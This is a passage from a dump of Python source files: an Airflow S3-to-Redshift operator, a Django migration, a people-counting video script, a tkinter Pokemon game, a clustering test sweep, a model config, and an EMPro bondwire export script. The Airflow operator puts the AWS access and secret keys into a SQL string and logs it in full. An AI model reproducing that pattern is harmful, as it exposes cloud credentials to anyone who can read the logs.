0\n\n\nperm(0)\n","sub_path":"2019/1912/BJ15649.py","file_name":"BJ15649.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"128463169","text":"from airflow.contrib.hooks.aws_hook import AwsHook\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass StageToRedshiftOperator(BaseOperator):\n ui_color = '#358140'\n template_fields = (\"s3_key\",)\n copy_sql = \"\"\"\n COPY {}\n FROM '{}'\n ACCESS_KEY_ID '{}'\n SECRET_ACCESS_KEY '{}'\n {} '{}'\n\"\"\"\n\n @apply_defaults\n def __init__(self,\n redshift_conn_id=\"\",\n aws_credentials_id=\"\",\n table=\"\",\n s3_bucket=\"\",\n s3_key=\"\",\n file_format = 'JSON',\n file_struct = 'auto',\n create_SQL = \"\",\n *args, **kwargs):\n\n super(StageToRedshiftOperator, self).__init__(*args, **kwargs)\n self.table = table\n self.redshift_conn_id = redshift_conn_id\n self.s3_bucket = s3_bucket\n self.s3_key = s3_key\n self.aws_credentials_id = aws_credentials_id\n self.file_format = file_format\n self.file_struct = file_struct\n self.execution_date = kwargs.get('execution_date')\n self.create_SQL = create_SQL\n \n def execute(self, context):\n self.log.info(f\"StageToRedshiftOperator processing {self.table}\")\n aws_hook = AwsHook(self.aws_credentials_id)\n credentials = aws_hook.get_credentials()\n redshift = PostgresHook(postgres_conn_id=self.redshift_conn_id)\n\n self.log.info(f\"Creating {self.table}\")\n redshift.run(self.create_SQL)\n\n self.log.info(f\"Clearing data from {self.table}\")\n redshift.run(f\"DELETE FROM {self.table}\")\n\n self.log.info(f\"Copying data from S3 to Redshift table {self.table}\")\n rendered_key = self.s3_key.format(**context)\n s3_path = \"s3://{}/{}\".format(self.s3_bucket, rendered_key)\n formatted_sql = StageToRedshiftOperator.copy_sql.format(\n self.table,\n s3_path,\n credentials.access_key,\n credentials.secret_key,\n self.file_format,\n self.file_struct\n )\n self.log.info(formatted_sql)\n redshift.run(formatted_sql)\n\n\n\n\n\n","sub_path":"home/airflow/plugins/operators/stage_redshift.py","file_name":"stage_redshift.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"43911699","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('revisions', '0007_auto_20141123_0513'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='revision',\n name='ref_id',\n field=models.IntegerField(default=1, db_index=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='revision',\n name='refmodel',\n field=models.CharField(default='', max_length=10, db_index=True, choices=[(b'pack', b'Pack models'), (b'collection', b'Collection models')]),\n preserve_default=False,\n ),\n ]\n","sub_path":"revisions/migrations/0008_auto_20141123_0541.py","file_name":"0008_auto_20141123_0541.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"139748072","text":"from mylib.centroidtracker import CentroidTracker\r\nfrom mylib.trackableobject import TrackableObject\r\nfrom imutils.video import VideoStream\r\nfrom imutils.video import FPS\r\nfrom mylib.mailer import Mailer\r\nfrom mylib import config, thread\r\nimport time, schedule, csv\r\nimport numpy as np\r\nimport argparse, imutils\r\nimport time, dlib, cv2, datetime\r\nfrom itertools import zip_longest\r\n\r\nt0 = time.time()\r\n\r\ndef run():\r\n\r\n\tap = argparse.ArgumentParser()\r\n\tap.add_argument(\"-p\", \"--prototxt\", required=False)\r\n\tap.add_argument(\"-m\", \"--model\", required=True)\r\n\tap.add_argument(\"-i\", \"--input\", type=str)\r\n\tap.add_argument(\"-o\", \"--output\", type=str)\r\n\tap.add_argument(\"-c\", \"--confidence\", type=float, default=0.4)\r\n\tap.add_argument(\"-s\", \"--skip-frames\", type=int, default=30)\r\n\targs = vars(ap.parse_args())\r\n\r\n\t# list of class labels MobileNet SSD trained to detect\r\n\tCLASSES = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\r\n\t\t\"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\r\n\t\t\"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\",\r\n\t\t\"sofa\", \"train\", \"tvmonitor\"]\r\n\r\n\t# load serialized model\r\n\tnet = cv2.dnn.readNetFromCaffe(args[\"prototxt\"], args[\"model\"])\r\n\r\n\t# import vid file\r\n\tprint(\"Stating vid\")\r\n\tvs = cv2.VideoCapture(args[\"input\"])\r\n\r\n\twriter = None\r\n\tW = None\r\n\tH = None\r\n\r\n\t# init centroid tracker\r\n\tct = CentroidTracker(maxDisappeared=40, maxDistance=50)\r\n\ttrackers = []\r\n\ttrackableObjects = {}\r\n\r\n\ttotalFrames = 0\r\n\ttotalDown = 0\r\n\ttotalUp = 0\r\n\tx = []\r\n\tempty=[]\r\n\tempty1=[]\r\n\r\n\t# process fps\r\n\tfps = FPS().start()\r\n\r\n\tif config.Thread:\r\n\t\tvs = thread.ThreadingClass(config.url)\r\n\r\n\t# loop vid frames\r\n\twhile True:\r\n\t\tframe = vs.read()\r\n\t\tframe = frame[1]\r\n\r\n\t\tif frame is None:\r\n\t\t\tbreak\r\n\r\n\t\t# resize frame\r\n\t\tframe = imutils.resize(frame, width = 500)\r\n\t\trgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n\r\n\t\t# set frame dimensions\r\n\t\tif W is None or H is None:\r\n\t\t\t(H, W) = frame.shape[:2]\r\n\r\n\t\tstatus = \"Waiting\"\r\n\t\trects = []\r\n\r\n\t\t# check to see if we should run a more computationally expensive\r\n\t\t# object detection method to aid our tracker\r\n\t\tif totalFrames % args[\"skip_frames\"] == 0:\r\n\t\t\t# set the status and initialize our new set of object trackers\r\n\t\t\tstatus = \"Detecting\"\r\n\t\t\ttrackers = []\r\n\r\n\t\t\t# convert the frame to a blob and pass the blob through the\r\n\t\t\t# network and obtain the detections\r\n\t\t\tblob = cv2.dnn.blobFromImage(frame, 0.007843, (W, H), 127.5)\r\n\t\t\tnet.setInput(blob)\r\n\t\t\tdetections = net.forward()\r\n\r\n\t\t\t# loop over the detections\r\n\t\t\tfor i in np.arange(0, detections.shape[2]):\r\n\t\t\t\t# extract the confidence (i.e., probability) associated\r\n\t\t\t\t# with the prediction\r\n\t\t\t\tconfidence = detections[0, 0, i, 2]\r\n\r\n\t\t\t\t# filter out weak detections by requiring a minimum\r\n\t\t\t\t# confidence\r\n\t\t\t\tif confidence > args[\"confidence\"]:\r\n\t\t\t\t\t# extract the index of the class label from the\r\n\t\t\t\t\t# detections list\r\n\t\t\t\t\tidx = int(detections[0, 0, i, 1])\r\n\r\n\t\t\t\t\t# if the class label is not a person, ignore it\r\n\t\t\t\t\tif CLASSES[idx] != \"person\":\r\n\t\t\t\t\t\tcontinue\r\n\r\n\t\t\t\t\t# compute the (x, y)-coordinates of the bounding box\r\n\t\t\t\t\t# for the object\r\n\t\t\t\t\tbox = detections[0, 0, i, 3:7] * np.array([W, H, W, H])\r\n\t\t\t\t\t(startX, startY, endX, endY) = box.astype(\"int\")\r\n\r\n\r\n\t\t\t\t\t# construct a dlib rectangle object from the bounding\r\n\t\t\t\t\t# box coordinates and then start the dlib correlation\r\n\t\t\t\t\t# tracker\r\n\t\t\t\t\ttracker = dlib.correlation_tracker()\r\n\t\t\t\t\trect = dlib.rectangle(startX, startY, endX, endY)\r\n\t\t\t\t\ttracker.start_track(rgb, rect)\r\n\r\n\t\t\t\t\t# add the tracker to our list of trackers so we can\r\n\t\t\t\t\t# utilize it during skip frames\r\n\t\t\t\t\ttrackers.append(tracker)\r\n\r\n\t\t# otherwise, we should utilize our object *trackers* rather than\r\n\t\t# object *detectors* to obtain a higher frame processing throughput\r\n\t\telse:\r\n\t\t\t# loop over the trackers\r\n\t\t\tfor tracker in trackers:\r\n\t\t\t\t# set the status of our system to be 'tracking' rather\r\n\t\t\t\t# than 'waiting' or 'detecting'\r\n\t\t\t\tstatus = \"Tracking\"\r\n\r\n\t\t\t\t# update the tracker and grab the updated position\r\n\t\t\t\ttracker.update(rgb)\r\n\t\t\t\tpos = tracker.get_position()\r\n\r\n\t\t\t\t# unpack the position object\r\n\t\t\t\tstartX = int(pos.left())\r\n\t\t\t\tstartY = int(pos.top())\r\n\t\t\t\tendX = int(pos.right())\r\n\t\t\t\tendY = int(pos.bottom())\r\n\r\n\t\t\t\t# add the bounding box coordinates to the rectangles list\r\n\t\t\t\trects.append((startX, startY, endX, endY))\r\n\r\n\t\t# draw a horizontal line in the center of the frame -- once an\r\n\t\t# object crosses this line we will determine whether they were\r\n\t\t# moving 'up' or 'down'\r\n\r\n\t\t# vertical line\r\n\t\tcv2.line(frame, (W // 2, 0), (W // 2, H), (0, 0, 0), 3)\r\n\r\n\t\t# cv2.putText(frame, \"-Prediction border - Entrance-\", (10, H - ((i * 20) + 200)),\r\n\t\t# \tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)\r\n\r\n\t\t# use the centroid tracker to associate the (1) old object\r\n\t\t# centroids with (2) the newly computed object centroids\r\n\t\tobjects = ct.update(rects)\r\n\r\n\t\t# loop over the tracked objects\r\n\t\tfor (objectID, centroid) in objects.items():\r\n\t\t\t# check to see if a trackable object exists for the current\r\n\t\t\t# object ID\r\n\t\t\tto = trackableObjects.get(objectID, None)\r\n\r\n\t\t\t# if there is no existing trackable object, create one\r\n\t\t\tif to is None:\r\n\t\t\t\tto = TrackableObject(objectID, centroid)\r\n\r\n\t\t\t# otherwise, there is a trackable object so we can utilize it\r\n\t\t\t# to determine direction\r\n\t\t\telse:\r\n\t\t\t\t# the difference between the y-coordinate of the *current*\r\n\t\t\t\t# centroid and the mean of *previous* centroids will tell\r\n\t\t\t\t# us in which direction the object is moving (negative for\r\n\t\t\t\t# 'up' and positive for 'down')\r\n\t\t\t\ty = [c[0] for c in to.centroids]\r\n\t\t\t\tdirection = centroid[0] - np.mean(y)\r\n\t\t\t\tto.centroids.append(centroid)\r\n\r\n\t\t\t\t# check to see if the object has been counted or not\r\n\t\t\t\tif not to.counted:\r\n\t\t\t\t\tif direction < 0 and centroid[0] < H // 2:\r\n\t\t\t\t\t\ttotalUp += 1\r\n\t\t\t\t\t\tempty.append(totalUp)\r\n\t\t\t\t\t\tto.counted = True\r\n\r\n\t\t\t\t\t# if the direction is positive (indicating the object\r\n\t\t\t\t\t# is moving down) AND the centroid is below the\r\n\t\t\t\t\t# center line, count the object\r\n\t\t\t\t\telif direction > 0 and centroid[0] > H // 2:\r\n\t\t\t\t\t\ttotalDown += 1\r\n\t\t\t\t\t\tempty1.append(totalDown)\r\n\t\t\t\t\t\tx = []\r\n\t\t\t\t\t\t# compute the sum of total people inside\r\n\t\t\t\t\t\tx.append(len(empty1)-len(empty))\r\n\t\t\t\t\t\tto.counted = True\r\n\r\n\t\t\t# store the trackable object in our dictionary\r\n\t\t\ttrackableObjects[objectID] = to\r\n\r\n\t\t\t# draw both the ID of the object and the centroid of the\r\n\t\t\t# object on the output frame\r\n\t\t\ttext = \"ID {}\".format(objectID)\r\n\t\t\tcv2.putText(frame, text, (centroid[0] - 10, centroid[1] - 10),\r\n\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)\r\n\t\t\tcv2.circle(frame, (centroid[0], centroid[1]), 4, (255, 255, 255), -1)\r\n\r\n\t\t# construct a tuple of information we will be displaying on the\r\n\t\tinfo = [\r\n\t\t(\"Exit\", totalUp),\r\n\t\t(\"Enter\", totalDown),\r\n\t\t(\"Status\", status),\r\n\t\t]\r\n\r\n\t\tinfo2 = [\r\n\t\t(\"Total people inside\", x),\r\n\t\t]\r\n\r\n\t\t# Display the output\r\n\t\tfor (i, (k, v)) in enumerate(info):\r\n\t\t\ttext = \"{}: {}\".format(k, v)\r\n\t\t\tcv2.putText(frame, text, (10, H - ((i * 20) + 20)), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 0), 2)\r\n\r\n\t\tfor (i, (k, v)) in enumerate(info2):\r\n\t\t\ttext = \"{}: {}\".format(k, v)\r\n\t\t\tcv2.putText(frame, text, (265, H - ((i * 20) + 60)), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 2)\r\n\r\n\t\t# Initiate a simple log to save data at end of the day\r\n\t\tif config.Log:\r\n\t\t\tdatetimee = [datetime.datetime.now()]\r\n\t\t\td = [datetimee, empty1, empty, x]\r\n\t\t\texport_data = zip_longest(*d, fillvalue = '')\r\n\r\n\t\t\twith open('Log.csv', 'w', newline='') as myfile:\r\n\t\t\t\twr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\r\n\t\t\t\twr.writerow((\"End Time\", \"In\", \"Out\", \"Total Inside\"))\r\n\t\t\t\twr.writerows(export_data)\r\n\r\n\t\t# show the output frame\r\n\t\tcv2.imshow(\"Real-Time Monitoring/Analysis Window\", frame)\r\n\t\tkey = cv2.waitKey(1) & 0xFF\r\n\r\n\t\t# if the `q` key was pressed, break from the loop\r\n\t\tif key == ord(\"q\"):\r\n\t\t\tbreak\r\n\r\n\t\t# increment the total number of frames processed thus far and\r\n\t\t# then update the FPS counter\r\n\t\ttotalFrames += 1\r\n\t\tfps.update()\r\n\r\n\t# stop the timer and display FPS information\r\n\tfps.stop()\r\n\tprint(\"[INFO] elapsed time: {:.2f}\".format(fps.elapsed()))\r\n\tprint(\"[INFO] approx. FPS: {:.2f}\".format(fps.fps()))\r\n\r\n\t# close any open windows\r\n\tcv2.destroyAllWindows()\r\n\r\nrun()\r\n","sub_path":"Run-SideView.py","file_name":"Run-SideView.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"627891761","text":"import tkinter as tk\nimport random\n\n\nclass Pokemon:\n def __init__(self,name,dexnum,rate,speed):\n self.name = name\n self.dex = int(dexnum)\n self.catchrate = int(rate)\n self.speed = int(speed)\n #Path to image location made into a PhotoImage object\n self.photo = tk.PhotoImage(file = \"sprites/\" + str(self.dex) + \".gif\")\n \n def __str__(self):\n return str(self.name)\n \n\n\nclass SafariSimulator(tk.Frame):\n def __init__(self, master=None):\n #Stores pokemon data in a 2D list\n pokedex = open('pokedex.csv')\n lines_list = pokedex.readlines()\n pokedex.close()\n pokelist = []\n for line in lines_list:\n line = line.strip('\\n').split(',')\n pokelist.append(line)\n\n #Stored instance variables\n self.pokelist = pokelist\n self.balls_left = 30\n self.pokemon_caught = []\n self.pokemon_num = 0\n\n #Creates playing window\n tk.Frame.__init__(self, master)\n master.minsize(width=275, height=350)\n master.maxsize(width=275, height=350)\n master.title(\"Safari Zone Simulator\")\n self.pack()\n self.nextPokemon()\n self.createWidgets()\n \n\n\n def createWidgets(self):\n #GUI components\n self.runButton = tk.Button(self)\n self.runButton[\"text\"] = \"Run Away\"\n self.runButton[\"command\"] = self.nextPokemon\n self.runButton.pack()\n \n\n self.throwButton = tk.Button(self)\n self.throwButton[\"text\"] = \"Throw Ball (\" + str(self.balls_left) + \" left)\"\n self.throwButton[\"command\"] = self.throwBall\n self.throwButton.pack()\n\n\n self.messageLabel = tk.Label(bg=\"grey\")\n self.messageLabel[\"text\"] = \"You encounter a wild \" + self.pokemon.name\n self.messageLabel.pack(fill=\"x\", padx=5, pady=5)\n\n\n self.pokemonImageLabel = tk.Label()\n self.pokemonImageLabel[\"image\"] = self.pokemon.photo\n self.pokemonImageLabel.pack()\n\n \n \n self.catchProbLabel = tk.Label(bg=\"grey\")\n self.catchProbLabel[\"text\"] = \"Your chance of catching it is \" + str(int(min(self.pokemon.catchrate + 1, 151)/4.495)) + \"%!\"\n self.catchProbLabel.pack(fill=\"x\", padx=5, pady=5)\n\n\n\n def nextPokemon(self):\n #Generates random number which represents index for pokemon in self.pokelist \n num = random.randint(1,151)\n #Uses data to create Pokemon object\n self.pokelist[num][0] = Pokemon(self.pokelist[num][1],self.pokelist[num][0],self.pokelist[num][2],self.pokelist[num][3])\n #Assigns the Pokemon object to self.pokemon\n self.pokemon = self.pokelist[num][0]\n\n #Updates the text and images in the GUI labels\n self.pokemon_num += 1 #avoids labels being packed multiple times\n if self.pokemon_num > 1:\n self.messageLabel[\"text\"] = \"You encounter a wild \" + self.pokemon.name\n self.pokemonImageLabel[\"image\"] = self.pokemon.photo\n self.catchProbLabel[\"text\"] = \"Your chance of catching it is \" + str(int(min(self.pokemon.catchrate + 1, 151)/4.495)) + \"%!\"\n \n\n \n def endAdventure(self):\n #clears screen\n self.runButton.pack_forget()\n self.throwButton.pack_forget()\n self.messageLabel.pack_forget()\n self.pokemonImageLabel.pack_forget()\n self.catchProbLabel.pack_forget()\n\n\n #Displays messages for end of game\n self.endMessage = tk.Label(bg=\"grey\")\n self.endMessage[\"text\"] = \"You're all out of balls, hope you had fun!\"\n self.endMessage.pack(fill=\"x\",padx=5,pady=5)\n\n self.caughtPokemon = tk.Label(bg=\"grey\")\n if len(self.pokemon_caught) > 0: #Determines whether or not player caught any Pokemon\n self.caughtPokemon[\"text\"] = \"You caught \" + str(len(self.pokemon_caught)) + \" Pokemon\\n\" + \"\\n\".join(self.pokemon_caught)\n else:\n self.caughtPokemon[\"text\"] = \"Oops, you caught 0 Pokemon.\"\n self.caughtPokemon.pack(fill=\"x\",padx=5,pady=0)\n\n \n\n def throwBall(self):\n self.balls_left -= 1\n\n #Updates the tect in self.throwButton\n self.throwButton[\"text\"] = \"Throw Ball (\" + str(self.balls_left) + \" left)\"\n \n if random.random() < (min(self.pokemon.catchrate + 1, 151))/449.5: #Checks if Pokemon should be caught\n self.pokemon_caught.append(self.pokemon.name) #Adds Pokemon name to list\n self.nextPokemon()\n else:\n self.messageLabel[\"text\"] = \"Aargh! It escaped\"\n\n if self.balls_left == 0:\n self.endAdventure()\n \n \n\napp = SafariSimulator(tk.Tk())\napp.mainloop()\n","sub_path":"UMN-CSCI/In Class/Pokemon/Original.py","file_name":"Original.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"627781585","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n# Filename: bestset.py\r\n# Author: Pedro H. A. Hasselmann\r\n\r\n# Escrevendo em python3 e usando python2.6:\r\nfrom __future__ import print_function, unicode_literals, absolute_import, division\r\nfrom os import path\r\nfrom collections import deque\r\n\r\ndef fit(where_data, q1_range, m_range):\r\n import Gmode as Gm\r\n from numpy import arange\r\n \r\n gmode = Gm.Gmode()\r\n \r\n gmode.load_data(filename=where_data)\r\n gmode.grid = 2\r\n \r\n form = \"{0:.2f} {1:.2f} {2:3} {3:4} {4:.4f}\".format\r\n report = deque([\"q1 mlim Nc E R\"])\r\n for mlim in arange(*m_range):\r\n for q1 in arange(*q1_range):\r\n gmode.q1 = q1\r\n gmode.mlim = mlim\r\n gmode.run(realtime_map='n', save='n')\r\n \r\n report.append(form(q1, mlim, len(gmode.cluster_stats), len(gmode.excluded), gmode.robust))\r\n\r\n out = open(path.join(\"TESTS\",\"tests.txt\"),\"w+\")\r\n\r\n text = '\\n'.join(list(report))\r\n\r\n out.write(text)\r\n\r\ndef plot(highlight=None, tests=\"tests.txt\", **lim):\r\n import matplotlib.pyplot as plt\r\n from numpy import loadtxt\r\n \r\n q1, mlim, Nc, excluded, robust = loadtxt(path.join(\"TESTS\",tests), unpack=True, dtype=None, skiprows=1)\r\n \r\n name = ['({0:.2f}, {1:.2f})'.format(*item) for item in zip(q1, mlim)]\r\n\r\n plt.figure(figsize=(10,10),dpi=100)\r\n\r\n # Robustness vs Nc\r\n plt.subplot(210)\r\n plt.plot(Nc, robust, \"ko\", markersize=4, alpha=0.7, label=\"Gmode Tests ($G_{q_{1}}, minlimit$)\")\r\n\r\n\r\n for n, texto in enumerate(name):\r\n #if any([True if item[0] == q1[n] and item[1] == mlim[n] else False for item in highlight]):\r\n if Nc[n] >= lim[\"Nc\"][0] and Nc[n] <= lim[\"Nc\"][1] and robust[n] <= lim[\"robust\"] \\\r\n and excluded[n] >= lim[\"excluded\"][0] and excluded[n] <= lim[\"excluded\"][1]:\r\n highl = plt.plot(Nc[n], robust[n], color=\"red\", marker=\"o\", markersize=7)\r\n plt.text(Nc[n], robust[n], texto, fontsize=8, fontweight='black', style='italic') \r\n highl[0].set_label(texto)\r\n \r\n plt.xlabel(\"$N_{c}$\")\r\n plt.ylabel(\"Robustness\")\r\n plt.legend(loc=0, numpoints=1, scatterpoints=1, fontsize=9)\r\n\r\n # Excluded number vs Nc\r\n plt.subplot(211)\r\n plt.plot(robust, excluded, \"ko\", markersize=4, alpha=0.7, label=\"Gmode Tests ($G_{q_{1}}, minlimit$)\")\r\n \r\n for n, texto in enumerate(name):\r\n #if any([True if item[0] == q1[n] and item[1] == mlim[n] else False for item in highlight]):\r\n if Nc[n] >= lim[\"Nc\"][0] and Nc[n] <= lim[\"Nc\"][1] and robust[n] <= lim[\"robust\"] \\\r\n and excluded[n] >= lim[\"excluded\"][0] and excluded[n] <= lim[\"excluded\"][1]:\r\n highl = plt.plot(robust[n], excluded[n], color=\"red\", marker=\"o\", markersize=7)\r\n plt.text(robust[n], excluded[n], texto, fontsize=8, fontweight='black', style='italic') \r\n highl[0].set_label(texto)\r\n \r\n plt.xlabel(\"Robustness\")\r\n plt.ylabel(\"Number of Excluded\")\r\n plt.legend(loc=0, numpoints=1, scatterpoints=1, fontsize=9)\r\n \r\n plt.show()\r\n plt.clf()\r\n \r\n \r\n\r\nif __name__ == \"__main__\":\r\n \r\n data_path = path.join(\"SDSSMOC\",\"lists\",\"MOC4_2quartile_refl.dat\")\r\n fit(data_path, [1.2,2.5,0.1],[0.05,0.4,0.05])\r\n #plot(tests=\"tests_mlim_moc2q.txt\", Nc=[20,50], excluded=[0, 700], robust=0.1)\r\n ","sub_path":"bestset.py","file_name":"bestset.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"112134249","text":"from yacs.config import CfgNode as CN\n\n\n_C = CN()\n\n_C.GPUS = (0,)\n_C.AUTO_RESUME = False\n\n# Cudnn related params\n_C.CUDNN = CN()\n_C.CUDNN.BENCHMARK = True\n_C.CUDNN.DETERMINISTIC = False\n_C.CUDNN.ENABLED = True\n\n# common params for NETWORK\n_C.MODEL = CN()\n_C.MODEL.NAME = 'pose_hrnet'\n_C.MODEL.PRETRAINED = ''\n_C.MODEL.NUM_JOINTS = 17\n_C.MODEL.TAG_PER_JOINT = True\n_C.MODEL.IMAGE_SIZE = [256, 256] # width * height, ex: 192 * 256\n_C.MODEL.HEATMAP_SIZE = [64, 64] # width * height, ex: 24 * 32\n_C.MODEL.SIGMA = 2\n\n_C.LOSS = CN()\n_C.LOSS.TOPK = 8\n_C.LOSS.USE_DIFFERENT_JOINTS_WEIGHT = False\n\n# DATASET related params\n_C.DATASET = CN()\n_C.DATASET.ROOT = ''\n_C.DATASET.COCO_BBOX_FILE = ''\n_C.DATASET.NAME = 'mpii'\n_C.DATASET.TRAIN_SET = 'train'\n_C.DATASET.TEST_SET = 'valid'\n_C.DATASET.DATA_FORMAT = 'jpg'\n_C.DATASET.SELECT_DATA = False\n\n# training data augmentation\n_C.DATASET.FLIP = True\n_C.DATASET.SCALE_FACTOR = 0.25\n_C.DATASET.ROT_FACTOR = 30\n_C.DATASET.PROB_HALF_BODY = 0.0\n_C.DATASET.NUM_JOINTS_HALF_BODY = 8\n\n# train\n_C.TRAIN = CN()\n\n_C.TRAIN.LR_FACTOR = 0.1\n_C.TRAIN.LR_STEP = [90, 110]\n_C.TRAIN.LR = 0.001\n\n\n_C.TRAIN.BEGIN_EPOCH = 0\n_C.TRAIN.END_EPOCH = 140\n\n_C.TRAIN.RESUME = False\n_C.TRAIN.CHECKPOINT = ''\n\n_C.TRAIN.BATCH_SIZE_PER_GPU = 32\n\n# testing\n_C.TEST = CN()\n\n# size of images for each device\n_C.TEST.BATCH_SIZE_PER_GPU = 32\n# Test Model Epoch\n_C.TEST.FLIP_TEST = False\n_C.TEST.POST_PROCESS = False\n_C.TEST.SHIFT_HEATMAP = False\n\n_C.TEST.USE_GT_BBOX = False\n\n# nms\n_C.TEST.BBOX_THRE = 1.0\n_C.TEST.MODEL_FILE = ''\n\n# debug\n_C.DEBUG = CN()\n_C.DEBUG.DEBUG = False\n_C.DEBUG.SAVE_BATCH_IMAGES_GT = False\n_C.DEBUG.SAVE_BATCH_IMAGES_PRED = False\n_C.DEBUG.SAVE_HEATMAPS_GT = False\n_C.DEBUG.SAVE_HEATMAPS_PRED = False\n\n\ndef update_config(cfg, args):\n cfg.defrost()\n cfg.merge_from_file(args.cfg)\n cfg.freeze()\n\n\nif __name__ == '__main__':\n import sys\n with open(sys.argv[1], 'w') as f:\n print(_C, file=f)\n\n","sub_path":"lib/config/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"556177076","text":"# Copyright Keysight Technologies 2014 - 2017 \n#\n# This calls the EMPro bondwire profile editor to create or update an EBOND compatible bondwire shape for ADS. \n# The scripting capability of EMPro is used to serialize an EMPro bondwire definition and process it into\n# a form that the AEL component creation code for an ADS EBOND profile can handle.\n#\nimport empro\nimport sys\nimport os\nimport string\nimport math\nimport xml.dom.minidom\n\nebondShapeDefault_string = u'''\n\n\n \n \n \n \n \n
\n \n
\n \n
\n \n
\n \n
\n \n
\n
\n
\ntesttingtest\n
\\\n'''\n\nclass adsVarNetlistWriter:\n def __init__(self, fname=\"netlist.nlog\", shapename=\"JEDEC\", bonddef_string=ebondShapeDefault_string):\n self.file = open( fname, \"w\" )\n self.shapename = str(shapename)\n self.dom = xml.dom.minidom.parseString(bonddef_string)\n \n def getValue(self, itag='Radius', iNode=None):\n attr = 'value'\n elTag=None\n if iNode:\n elTag = iNode.getElementsByTagName(itag)\n else:\n elTag = self.dom.getElementsByTagName(itag)\n elFormula = elTag[0].getElementsByTagName('Formula')\n if elFormula[0].hasAttribute(attr):\n return elFormula[0].getAttribute(attr)\n \n def write(self):\n rw=self.getValue('Radius')\n rw=rw.strip()\n if rw[-2:]==' m':\n rw=rw.replace(' m', ' meter')\n\n numFaces = self.getValue('NumFaces')\n netlist = 'BWSHAPE|NAME=' + self.shapename + '|INSTANCE=Shape|MATERIAL=Gold|COND=4.1e7|RW=' + str(rw)\n netlist += '|ER=1.0|HEIGHT1=200 um|HEIGHT2=200 um|GNDHEIGHT=0 um|LENGTH=500 um|LAYER1=1|LAYER2=1|GNDLAYER=2|DRAWLAYER=6|VIEW=1'\n netlist += '|NUMFACES=' + str(numFaces) + '|ANNOTATELAYER=6|ANNOTATEHEIGHT=10'\n elVerts = self.dom.getElementsByTagName('Vertex')\n i=1\n for elVert in elVerts:\n tType = 'ST'\n tUnitClass = elVert.getAttribute('tUnitClass')\n dt = self.getValue('dt',elVert)\n dt = dt.strip()\n if tUnitClass=='LENGTH':\n tType = 'DL'\n if dt[-2:]==' m':\n dt = dt.replace(' m', ' meter') # m is behaving as 1.e-3 in ADS, meter is used instead\n elif tUnitClass=='ANGLE':\n tType = 'AT'\n # need to be degrees for ADS without unit\n if dt[-4:]==' deg':\n dt = dt.replace(' deg','')\n else:\n try:\n val = float(dt)\n dt = val*180.0/math.pi\n except:\n pass\n elif tUnitClass=='SCALAR':\n if dt[-3:]=='pct':\n dt = dt.replace('pct','') # pct is not a known unit in ADS\n val = float(dt) * .01\n dt = val\n \n tReference=elVert.getAttribute('tReference')[0]\n \n zType = 'ST'\n zUnitClass = elVert.getAttribute('zUnitClass')\n dz = self.getValue('dz',elVert)\n dz = dz.strip()\n if zUnitClass=='LENGTH':\n zType = 'DL'\n if dz[-2:]==' m':\n dz = dz.replace(' m', ' meter')\n elif zUnitClass=='ANGLE':\n zType = 'AT'\n # need to be degrees for ADS without unit\n if dz[-4:]==' deg':\n dz = dz.replace(' deg','')\n else:\n try:\n val = float(dz)\n dz = val * 180.0/math.pi\n except:\n pass\n elif zUnitClass=='SCALAR':\n if dz[-3:]=='pct':\n dz = dz.replace('pct','') # pct is not a known unit in ADS\n val = float(dz) * .01\n dz = val\n\n zReference = elVert.getAttribute('zReference')[0]\n netlist += '|PT='\n netlist += tReference + '=' + tType + '=' + str(dt)\n netlist += \"=\" + zReference + '=' + zType + '=' + str(dz)\n i += 1\n netlist += '|END'\n self.file.write(netlist)\n \n def close(self):\n self.file.close()\n\nbonddef_string=''\nshapeName=''\nif len(sys.argv)!=3:\n exit(1)\n \nshapename = sys.argv[1]\nfname = sys.argv[2]\nif os.path.isfile(fname):\n try:\n f=open(fname, 'r')\n bonddef_string = string.join(f.readlines())\n f.close()\n except:\n raise \nelse:\n bonddef_string = ebondShapeDefault_string.replace(\"JEDEC\", 'for ' + str(shapename))\n \nbonddef = empro.geometry.BondwireDefinition.deserialize(bonddef_string)\n\napp = empro.gui.BaseApp()\napp.init(sys.argv)\n\ndialog = empro.gui.SimpleDialog()\ndialog.windowTitle = \"Bondwire Profile Definition Editor\"\n\neditor = empro.gui.BondwireDefinitionEditor(bonddef, None)\ndialog.layout.add(editor)\n\naccepted = False\ndef onFinished(rc):\n global accepted\n accepted |= (rc == 1)\ndialog.onFinished = onFinished\n\ndialog.show(True)\n\nadsFname=fname + '.nlog'\nif accepted:\n bonddef_string = bonddef.serialize()\n try:\n 